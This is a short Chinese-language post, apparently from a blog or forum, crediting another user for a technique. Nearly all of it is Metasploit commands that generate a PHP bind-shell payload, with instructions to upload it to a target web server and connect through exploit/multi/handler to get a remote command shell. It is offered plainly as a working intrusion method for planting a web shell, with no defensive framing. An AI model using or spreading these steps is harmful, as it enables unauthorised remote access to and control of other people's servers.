感謝:
perl6大佬分享的姿勢。
MSF:
msf > use payload/php/bind_php
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目標內網ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就會在f盤生成xishaonian.php腳本一般都是需要修改一下,沒有php標簽就加個php標簽之類的。
然后將xishaonian.php傳到web上。
然后再次運行msf
use payload/php/bind_php
msf payload(bind_php) > set RHOST 目標外網ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run
訪問web上的xishaonian.php,就可以反彈到cmdshell了。
